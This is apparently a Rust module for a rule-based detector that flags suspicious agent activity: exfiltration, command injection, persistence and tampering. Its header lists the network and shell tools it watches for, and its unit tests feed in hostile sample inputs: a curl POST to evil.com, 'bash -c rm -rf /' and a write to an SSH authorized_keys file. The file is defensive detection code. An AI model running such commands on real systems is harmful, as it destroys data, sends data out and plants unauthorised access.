//! Rule-based detector for suspicious agent activity.
//!
//! Categories:
//! - Exfil: curl, wget, scp, rsync, nc, ssh, DNS tools
//! - Injection: bash -c, python -c, base64 decode, eval, shell init writes
//! - Persistence: crontab, systemd units, SSH keys, setuid
//! - Tamper: rm, truncate, chattr, systemctl stop/disable

use serde::{Deserialize, Serialize};

mod rules;
pub use rules::*;

/// Alert severity levels.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum Severity {
    Low,
    Medium,
    High,
    Critical,
}

/// Alert category.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "snake_case")]
pub enum Category {
    Exfil,
    Injection,
    Persistence,
    Tamper,
    Anomaly,
}

/// An alert generated by the detector.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Alert {
    pub severity: Severity,
    pub category: Category,
    pub rule_id: String,
    pub description: String,
    pub pid: Option<u32>,
    pub uid: Option<u32>,
    pub argv_snip: Option<String>,
    pub paths: Vec<String>,
    pub evidence: String,
}

/// Input event for detection (exec or file operation).
#[derive(Debug, Clone)]
pub enum DetectorInput {
    Exec {
        pid: u32,
        uid: u32,
        comm: String,
        argv: Vec<String>,
        cwd: Option<String>,
    },
    FileOp {
        pid: u32,
        uid: u32,
        op: FileOp,
        path: String,
    },
}

#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub enum FileOp {
    Open,
    Write,
    Unlink,
    Rename,
}

/// The detector holds compiled rules and runs them against inputs.
pub struct Detector {
    exec_rules: Vec<ExecRule>,
    file_rules: Vec<FileRule>,
}

impl Default for Detector {
    fn default() -> Self {
        Self::new()
    }
}

impl Detector {
    /// Create detector with default rules.
    pub fn new() -> Self {
        Self {
            exec_rules: rules::default_exec_rules(),
            file_rules: rules::default_file_rules(),
        }
    }

    /// Run detection on an input, returning any alerts.
    pub fn detect(&self, input: &DetectorInput) -> Vec<Alert> {
        match input {
            DetectorInput::Exec { pid, uid, comm, argv, .. } => {
                self.detect_exec(*pid, *uid, comm, argv)
            }
            DetectorInput::FileOp { pid, uid, op, path } => {
                self.detect_file(*pid, *uid, *op, path)
            }
        }
    }

    fn detect_exec(&self, pid: u32, uid: u32, comm: &str, argv: &[String]) -> Vec<Alert> {
        let argv_str = argv.join(" ");
        let mut alerts = Vec::new();

        for rule in &self.exec_rules {
            let matched = match &rule.match_type {
                ExecMatch::Command(re) => re.is_match(comm),
                ExecMatch::Argv(re) => re.is_match(&argv_str),
                ExecMatch::CommandAndArgv { comm: comm_re, argv: argv_re } => {
                    comm_re.is_match(comm) && argv_re.is_match(&argv_str)
                }
            };

            if matched {
                alerts.push(Alert {
                    severity: rule.severity,
                    category: rule.category,
                    rule_id: rule.id.clone(),
                    description: rule.description.clone(),
                    pid: Some(pid),
                    uid: Some(uid),
                    argv_snip: Some(truncate(&argv_str, 200)),
                    paths: vec![],
                    evidence: format!("comm={comm}, argv matched rule {}", rule.id),
                });
            }
        }

        alerts
    }

    fn detect_file(&self, pid: u32, uid: u32, op: FileOp, path: &str) -> Vec<Alert> {
        let mut alerts = Vec::new();

        for rule in &self.file_rules {
            if rule.ops.contains(&op) && rule.path_re.is_match(path) {
                alerts.push(Alert {
                    severity: rule.severity,
                    category: rule.category,
                    rule_id: rule.id.clone(),
                    description: rule.description.clone(),
                    pid: Some(pid),
                    uid: Some(uid),
                    argv_snip: None,
                    paths: vec![path.to_string()],
                    evidence: format!("op={op:?}, path matched rule {}", rule.id),
                });
            }
        }

        alerts
    }
}

fn truncate(s: &str, max: usize) -> String {
    if s.len() <= max {
        s.to_string()
    } else {
        format!("{}…", &s[..max])
    }
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn detect_curl_exfil() {
        let detector = Detector::new();
        let input = DetectorInput::Exec {
            pid: 1234,
            uid: 1000,
            comm: "curl".to_string(),
            argv: vec!["curl".to_string(), "-X".to_string(), "POST".to_string(), "https://evil.com".to_string()],
            cwd: None,
        };
        let alerts = detector.detect(&input);
        assert!(!alerts.is_empty());
        assert_eq!(alerts[0].category, Category::Exfil);
    }

    #[test]
    fn detect_bash_injection() {
        let detector = Detector::new();
        let input = DetectorInput::Exec {
            pid: 1234,
            uid: 1000,
            comm: "bash".to_string(),
            argv: vec!["bash".to_string(), "-c".to_string(), "rm -rf /".to_string()],
            cwd: None,
        };
        let alerts = detector.detect(&input);
        assert!(alerts.iter().any(|a| a.category == Category::Injection));
    }

    #[test]
    fn detect_ssh_key_write() {
        let detector = Detector::new();
        let input = DetectorInput::FileOp {
            pid: 1234,
            uid: 1000,
            op: FileOp::Write,
            path: "/home/user/.ssh/authorized_keys".to_string(),
        };
        let alerts = detector.detect(&input);
        assert!(alerts.iter().any(|a| a.category == Category::Persistence));
    }

    #[test]
    fn benign_passes() {
        let detector = Detector::new();
        let input = DetectorInput::Exec {
            pid: 1234,
            uid: 1000,
            comm: "ls".to_string(),
            argv: vec!["ls".to_string(), "-la".to_string()],
            cwd: None,
        };
        let alerts = detector.detect(&input);
        assert!(alerts.is_empty());
    }
}
